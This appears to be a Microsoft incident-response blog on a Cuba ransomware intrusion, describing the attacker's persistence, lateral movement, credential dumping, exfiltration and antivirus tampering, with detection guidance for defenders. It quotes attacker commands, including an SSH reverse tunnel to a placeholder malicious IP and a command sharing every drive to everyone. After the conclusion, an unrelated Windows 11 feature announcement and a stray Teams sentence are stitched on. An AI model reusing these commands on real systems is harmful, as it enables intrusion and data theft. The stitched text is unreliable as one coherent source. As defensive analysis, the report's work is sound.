DART was unable to determine the initial entry vector of this attack due to the age of this compromise and limited retention of security solutions, along with encrypted devices being reimaged before analysis. The earliest observed activity showed the actor with domain administrator credentials.
Persistence
In DART’s post ransomware investigation of this engagement, the team found multiple instances of scheduled tasks and services being created by the attack for persistence after they had gained access to highly privileged credentials. Services and Scheduled Tasks have the option to run as NT AUTHORITY\System, allowing their malicious code to run with highly privileged access. Because the actor created those tasks and services on a domain controller, the Local SYSTEM access allowed them to easily access domain administrator accounts. The deployment of a backdoor to a domain controller can help an actor bypass common incident response recovery activity, such as resetting compromised accounts, in the hope of staying resident on the network.
Service: Cobalt Strike
Cobalt Strike was seen on a large scale across the network, on domain controllers, servers, and administrator workstations. The actor created Windows services to persist their payload executing rundll32 to load the Cobalt Strike DLL through invoking the “AllocConsole” exported function of a variation of the Termite family of malware. These services were observed to execute with a combination of SYSTEM and domain administrator credentials. Termite malware is often used by crimeware groups to load Cobalt Strike while bypassing antivirus detections. Further information on the Termite malware family can be found in this blog: (Ex)Change of Pace: UNC2596 Observed Leveraging Vulnerabilities to Deploy Cuba Ransomware.
Figure 2. Example of the actor executing Cobalt Strike through rundll32.exe with system integrity
The Cobalt Strike DLLs were in C:\Windows\Temp and used a naming scheme based on the first and local octet of the command and control (C2). Once the actor installed Cobalt Strike on a domain controller, the malware was spread using a PowerShell script, which copied the DLL to C:\Windows\Temp via SMB, and then executed it through remote service creation.
Figure 3. Example of the threat actor copying Cobalt Strike through SMB
The actor elevated their permissions to “NT AUTHORITY\System” through service creation. This service creation was likely done through Cobalt Strike, using a pseudorandom service name, such as “4aedb00”.
Scheduled task: OpenSSH
The actor installed OpenSSH on the client’s network to maintain persistence on critical servers, including domain controllers and domain administrator workstations. The actor installed OpenSSH within C:\Windows\OpenSSH, rather than the standard OpenSSH path in System32.
The actor created a scheduled task for a persistent SSH connection to their C2 as “NT AUTHORITY\System”. The actor used TCP 443 for their SSH traffic rather than the standard TCP 22. In many organizations, TCP 22 outbound may be blocked, but as TCP 443 is needed for web traffic the port is often open. The actor also enabled port forwarding on TCP 7878 to allow the tunneling of malicious tools through the SSH connection.
The actor was also observed renaming ssh.exe to “C:\Windows\OpenSSH\svchost.exe” in a likely attempt to evade detection.
Figure 4. Example of the process masquerading to hide SSH usage
Four days after the actor deployed the ransomware, the actor returned to the compromised network through their existing OpenSSH persistence to install further persistence SSH services on additional domain controllers and domain administrator workstations.
The actor used OpenSSH’s sftp-server to transfer files between their C2 and the compromised host. The actor generated SSH keys on compromised hosts using ssh-keygen.exe, a tool apart of the OpenSSH tool suite. This allowed the actor to SSH using the keys rather than credentials, after credentials had been reset.
Lateral movement
Impacket (WMI)
Impacket’s WMI modules were used throughout the early stages of the compromise for remote execution and discovery. Impacket is an open-source collection of scripts for working with network protocols. This toolkit has recently been used by a large variety of crimeware groups for lateral movement and network discovery.
The actor used Impacket to execute PowerShell scripts out of “C:\Perflogs\”, which created .txt files within the same directory. All commands executed through Impacket output the results of the command to “\\127.0.0.1\ADMIN$\__1648051380.61”. The actor then deleted the PowerShell scripts and text files after execution.
Figure 5. Sample Impacket query with results being output into a file within the ADMIN$ directory
The actor also used Impacket to test if the destination server was able to ping the actor’s C2 before deploying Cobalt Strike to the device.
Figure 6. Actor testing the connectivity to their C2 through Impacket
PsExec
The actor used PsExec.exe to spread the ransomware on the victims’ network. The actor first executed “open.bat”, which executed “net share [C-Z]=[C-Z]:\ /grant:everyone,FULL”. This shared every drive on the host, granting access to everyone. “A.exe”, “Anet.exe”, and “Aus.exe” are all variants of the Cuba ransomware.
Figure 7. Command lines the actor executed through PsExec
Remote desktop protocol
While the attacker had access to lateral movement and remote code execution via Impacket and PsExec, the main method they used for lateral movement in this incident was Remote Desktop Protocol (RDP), which allowed them to use a GUI environment to change system settings and install malware. The actor used domain administrator accounts to RDP between devices.
Credential access
WDigest
The actor abused WDigest to cache credentials early in the compromise. This enabled the actor to gain access to domain administrator credentials.
WDigest is a Windows feature that when enabled, caches credentials in clear text. This is often abused by credential access tools, such as Mimikatz. To detect if WDigest has been enabled within your network, the registry key HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential will be set to 1. This can be disabled by setting the value to 0.
Figure 8. Example of the actor enabling WDigest
NTDSUtil Dumping
The actor obtained the Active Directory database (NTDS.dit) twice. On the first instance, the actor obtained the NTDS.dit five months into the compromise. Four days after the deployment of ransomware, the actor obtained the NTDS.dit a second time. The actor was able to create a copy of the NTDS.dit through the usage of the native tool ntdsutil.exe, copying the .dit to “C:\Windows\Temp\data\audit\Active Directory\ntds.dit”.
Figure 9. Actor command to obtain ntds.dit
Volume shadow copy access
The actor used a second method to obtain the Active Directory database, they used “vssadmin” to create a volume shadow copy of a domain controller. This technique creates a static copy of system files that a user would not typically be able to access. Once the volume shadow copy was created, the actor copied the NTDS.dit, SYSTEM hive and SECURITY hive to C:\Windows\, where they could then remotely copy through the ADMIN$ share.
Figure 10. Actor commands to create Volume Shadow Copy and copy the ntds.dit
Exfiltration
Compression
The actor was observed using 7-Zip to compress files before exfiltration. 7z.exe was executed out of C:\Windows\Temp. The actor did not include a password for the archive and used the device hostname as the name of the archive (for example: DC01.7z).
PSCP
The actor used PuTTY Secure Copy (PSCP) to remotely exfiltrate network shares to an actor controlled C2. This version of PSCP had been renamed to “lsas.exe” in an attempt to masquerade itself as the legitimate “lsass.exe” service. PSCP was executed out of C:\Windows\Temp. The actor targeted Staff and Financial related resources.
Figure 11. Masqueraded PSCP to exfiltrate files
Defense evasion
Disabling antivirus
The actor disabled Microsoft Defender Antivirus on multiple devices after files had been quarantined by the antivirus. The actor turned off Microsoft Defender Antivirus through the Windows Security GUI application while connected via RDP to the device.
Figure 12. Microsoft Defender for Endpoint alert from the actor disabling real-time monitoring
Kernel driver
The actor used an Avast anti-rootkit driver. Unit 42 recently released a blog on how Cuba ransomware groups have used this driver to disable antivirus software before deploying the Cuba ransomware.
The actor installed the driver using the “sc” command, enabling kernel-level permissions. The actor then started the service with “sc start aswSP-ArPot2”. This service was used by the actor to disable the victims’ antivirus products through Kernel privileges. Antivirus products being disabled within the victim network ensured that their ransomware would spread without the malware being quarantined or prevented.
Figure 13. Vulnerable driver being installed
The actor also created benign binaries to trigger the driver vulnerability. These binaries would iterate through a list of common antivirus executable names, providing each one to the control code 0x9988C094 and subsequently tasking the driver to kill those processes.
Discovery
The actor was observed executing generic system enumeration commands. While these commands are not malicious, when seen together, it can often indicate an unauthorized user is enumerating the system.
The actor was seen executing the following commands:
As we observe more attacks using similar methods as described in this blog, organizations must ensure they follow security practices to defend their servers. The following is a list of recommendations for monitoring that organizations should implement as part of their detection strategy.
Service creation
Service creation events should be monitored for anomalous events. A high priority alert should be placed on administrator accounts creating services that execute as System. This is a common privilege escalation technique that can be utilized in a variety of methods, including having the service.
Execute a malicious binary directly,
Write to an actor controlled Named Pipe, allowing the actor to steal an impersonation token,
Executing a DLL through rundll32.exe
Figure 14. Instance of rundll32.exe execute Cobalt Strike with System integrity level
New service creations should be monitored for anomalous paths or executables. High priority alerts should be made for drivers located within those anomalous paths. While the driver was legitimately signed, the location can be a sign of malicious use. Examples of anomalous paths include but are not limited to:
C:\Temp\
C:\ProgramData\
C:\Windows\
C:\Windows\Temp\
Use of SSH
Microsoft recommends monitoring for unauthorized installations and usage of SSH in your network. SSH should not run as “NT AUTHORITY\System”.
In this incident, the actor used the following SSH command lines. Similar activity should be monitored within your environment:
ssh <organization>@<malicious IP address> -p 443 -i C:\ProgramData\ssh\id_ed25519 -R <malicious IP address>:10129:127.0.0.1:7878 -N -C -o IdentitiesOnly=yes -o StrictHostKeyChecking=no
The actor attempted to masquerade the SSH process as “svchost.exe”, so monitoring for the command on other process names may indicate process masquerading.
Copying to remote share
Microsoft recommends monitoring for the command prompt accessing remote shares. This was a common technique used by the actor for transferring files throughout the network.
Figure 15. The actor copying Cobalt Strike via SMB
Microsoft Defender for Endpoint will create an alert when the command prompt accesses remote shares. This includes the Impacket usage where the command targets the localhost ADMIN$ share. Monitoring these alerts within your network can help detect unauthorized access.
Figure 16. Sample alert in Defender for Endpoint when a command prompt accesses a remote share
PsExec
Networks should monitor for unauthorized usage of PsExec. Suggested detection techniques include:
Existence or execution of the binary: PsExec.exe
Existence or execution of the service binary: PsExeSvc.exe
Service creation named PsExeSvc
Named Pipes created with the name PsExeSvc
The techniques that PsExec uses can easily be replicated, either through living-off-the-land tools or through a custom toolset using the Windows API. Monitoring for each stage of PsExec can help detect unauthorized variants within your network. PsExec works in three stages:
SMB connection to ADMIN$ on the destination device, copying the binary “PSEXESVC” to the Windows directory.
Remote connection to RPC (port 135) on the destination device, creating a service to execute the binary.
Create the named pipe \\.\pipe\PSEXESVC to remotely communicate between host and destination.
Figure 17. Diagram describing how PsExec works
Monitoring executable files being written to administrative shares may help detect attempts of lateral movement. This can include monitoring for native command lines, such as copy, targeting remote shares like what we mentioned above. Defender for Endpoint can be used to monitor file creation events via Server Message Block (SMB) through DeviceFileEvents. The executable file will be created by the ntoskrnl.exe process, which is the kernel process that manages SMB, and the ShareName column will be ADMIN$.
Figure 18. Example of PsExeSvc.exe being created via Server Message Block (SMB) in Defender for Endpoint
Anomalous remote connections to RPC (Port 135) should be monitored within the network, as this can be used by a process to remotely create and start a service. The summarize and sort operators within Defender for Endpoint’s Advanced Hunting can help detect uncommon connections on Port 135. The following KQL can help build a basis for identifying anomalous connections:
DeviceNetworkEvents
| where RemotePort == 135
| summarize count() by InitiatingProcessFileName
| sort by count_ asc
Figure 19. Image showing PsExec.exe connecting to a remote host on port 135
This technique can also be replicated through remote service creation using named pipes. An actor can remotely connect to the IPC$ share and open the named pipe svcctl to remotely create a service. This would contain similar detections, except the traffic will be over port 445 to the IPC$ share.
On the destination end, the RPC connection will result in the creation of a service. Monitoring for unauthorized service creation can be done through capturing the 4679 event in the System event log.
Figure 20. Service creation event in Defender for Endpoint
Remote named pipe communication can be monitored through the creation of the named pipe on the destination server. PsExeSvc.exe will create a named pipe called PSEXESVC, which the host device can connect to through the IPC$ share. As the host device connection is through SMB, the ntoskrnl.exe process will connect to the named pipe as a client.
Figure 21. Remote SMB named pipe communications for PsExec
NTDS.dit dumping
Monitor the usage of ntdsutil for malicious instances, where actors may attempt to obtain the NTDS.dit. The command in the NTDS.dit dumping section shows how the actor used this tool to create a copy of the NTDS.dit. This command can be monitored, with the path being the only variable that will change. There are limited legitimate reasons to create a full NTDS.dit copy.
Figure 22. Defender for Endpoint alert from ntds.dit dump
Defender for Endpoint alerts on the dumping of the NTDS.dit, and these alerts should be responded to with high priority. Monitoring for the unauthorized usage of the “ntdsutil” tool is strongly encouraged as well.
If your network has file monitoring enabled, alerting on the creation of new .dit files can also help detect potential NTDS.dit dumping. The actor was observed copying the NTDS.dit out of a volume shadow copy.
Figure 23. Example command copying NTDS.dit from a volume shadow copy
Antivirus tampering
Organizations should monitor and respond to antivirus and endpoint detection and response (EDR) alerts where antivirus has been disabled or tampered with. Wherever possible, anti-tampering settings should be enabled to prevent actors from being able to interact with and disable antivirus software. For more information about Defender for Endpoint tamper protection, visit our docs page: Protect security settings with tamper protection.
Microsoft Defender Antivirus provides event logging on attempted tampering of the product. This can include the disabling of services, such as Real Time Protection (Event ID: 5001). An alert will also be created within the Defender for Endpoint portal where customers have the ability to further triage the alert through the advanced hunting interface. Monitoring for the usage of the Windows PowerShell cmdlet can also help discover instances of anti-virus tampering.
Figure 24. Sample command to look for antivirus tampering
Remote desktop protocol
DART was able to detect actor RDP connections through anomalous connections. These anomalous connections include:
Domain administrators logging into multiple servers for the first time, and
Domain administrators initiating RDP connections from abnormal locations.
Domain and enterprise administrator logons should be audited for anomalous connections, including connections originating from edge servers or onto servers that they do not usually administrate. Multifactor authentication (MFA) should be enforced for administrator accounts.
Conclusion
Ransomware groups continue to grow in sophistication through the increasing hibernation times before encryption, large varieties of persistent access and the use of legitimate signed binaries. These groups continue to target sensitive data for exfiltration, with some groups returning to the network post-encryption to ensure they maintain a foothold on the network.
Networks must remain vigilant hunting for these TTPs and anomalous behaviors. The Cuba ransomware group used a large variety of living of the land techniques to help evade detection by antivirus products. This requires a stronger focus on anomaly and behavioral detections for hunting on a network, rather than standard malicious file detection. Software auditing of remote access tools and remote execution tools, such as PsExec and SSH, should be regularly evaluated.
Microsoft strongly recommends focusing on the following actions to help improve your network’s security posture:
Enabling tamper protection on antivirus products.
Triage high severity antivirus and EDR alerts within a timely manner, including tampering alerts.
Enable MFA and monitoring for administration accounts.
Monitoring anomalies in service and scheduled task creation.
To understand how Microsoft can help you secure your network and respond to network compromise, visit https://aka.ms/DART.
Today, we are excited to announce the availability of new features in Windows 11 along with some exciting new experiences to help you be your most productive and creative, while also having fun. Announced in September, these new features and experiences begin to be available today and are a continuation of our commitment and journey to deliver continuous innovation in Windows to inspire and empower you.
It’s been an energizing few weeks for Windows with the launch of the Windows 11 2022 Update in 190+ countries around the world and our announcement just last week of new Surface devices. At the event, the team enjoyed showing you how Windows 11 comes to life on the new devices enabling you to participate, be seen, heard and express your creativity. If you missed the event, you can watch it here.
Let’s jump into what’s new and available starting today.
Tabbed File Explorer1: One of our most loved and highly utilized features, File Explorer, is getting better. Windows is always looking for ways to simplify your everyday tasks and make collaborating as effortless as possible. So, we’re releasing Tabs to File Explorer that let you organize your files and switch between your folders with ease. The new Favorites section is the perfect place to pin your most used files. And thanks to the power of OneDrive we’re making it easier for you to see important information like which of your colleagues most recently edited or commented on your file. When sharing content, Windows can also provide a list of contacts you’re likely to share content with and some personalized suggestions based on your Microsoft 365 account. (Microsoft 365 subscription sold separately)
Suggested Actions1: Another way Windows is making your everyday tasks like collaborating with colleagues more efficient is by anticipating your needs and giving you suggestions for actions you may wish to take. For instance, when there are phone numbers or future dates in text, Windows highlights them, making it easy to click and call with Phone Link, Teams or Skype, or click to schedule an appointment, adding an event in your Calendar app and including the person you were communicating with on your invite.
Taskbar Overflow and easy access to Task Manager: Taskbar is getting two highly requested enhancements. First, if you like to pin a larger selection of apps to your taskbar than space allows, Taskbar gives you an entry point to an overflow menu that allows you to view all your overflowed apps in one space. Second, when you right click on the taskbar, in addition to Taskbar Settings, you will also see an option to jump directly into your Task Manager. These improvements have been made in direct response to your feedback and to give you access to what is important with a single click.
Share to more devices: To make sharing files even easier, we have enhanced the Windows Share experience so that you can simply share files with more discoverable devices nearby directly from your desktop, File Explorer, Photos, Snipping Tool, Xbox and other apps.
Photos app: Coming at the end of October, the Photos app on Windows 11 has been beautifully crafted to make organization of your photo collection easy, no matter where your photos come from — your phone, your camera, OneDrive — see them all together in one gorgeous gallery. We’re also delighted to deliver an exciting new Memories experience which resurfaces pictures you’ve saved on OneDrive, making revisiting life’s magical moments simple and effortless2. Enjoy picture compilations of recent highlights, time spent with loved ones, and more.
We also recently announced that the Photos app can now seamlessly access all the photos on your iPhone with direct connection to your iCloud photo library. Just install iCloud for Windows from the Microsoft Store and the photos you take with your iPhone will appear automatically in your Photos app. iCloud integration will be available in November.
Amazon Appstore: Through our partnership with Amazon, you can now access Android™ apps and games from the Amazon Appstore, generally available in 31 countries, including Australia, Canada, France, Germany, Italy, Japan, Spain, United Kingdom, United States and more. With over 50,000 titles to choose from, it’s easy to discover and download your favorite apps and games on your Windows device, such as Project Makeover, Evony: The King’s Return, Coin Master, Kindle, Audible, FlipaClip, Lutron and so many more3. Enabled by Windows Subsystem for Android™, developers now have even more ways to bring their apps and games to Windows – learn more here.
New sports and entertainment apps: For fans everywhere, we are excited to announce that the ESPN app is available in the Microsoft Store globally across 239 markets4. This app joins the growing entertainment catalog, including well-known brands such as Hulu, Netflix, Discord, Vudu, Tubi, Crunchyroll, TikTok, along with Disney+ and Amazon Prime Video for an expanded catalog of titles – making Windows your destination for the entertainment and sports you seek.
We are delighted to deliver on our promise to bring you brand new experiences into Windows 11. These new features and experiences will start to become available today in an optional non-security preview release and a phased rollout via our servicing technology and new apps via Microsoft Store updates5, ensuring you can take advantage of the latest Windows experiences as these new features are ready. The new features will be made broadly available to all editions of Windows 11, version 22H2 in the November 2022 security update release. Going forward we will continue to announce, document and deliver new features and experiences when they are ready (learn more).
If you haven’t moved to Windows 11 yet, now is the time. From Surface to our incredible OEM partners, there is a broad array of choice in Windows 11 PCs to meet your needs. You can learn more here.
Android is a Trademark of Google LLC.
1Timing of feature delivery varies by device. Feature availability may vary by market.
2Access to images stored on OneDrive is contingent on the associated Microsoft Account the device is signed in with.
The Help icon to the right of Never translate (language) allows you to provide feedback that will be used to improve language detection in Teams.
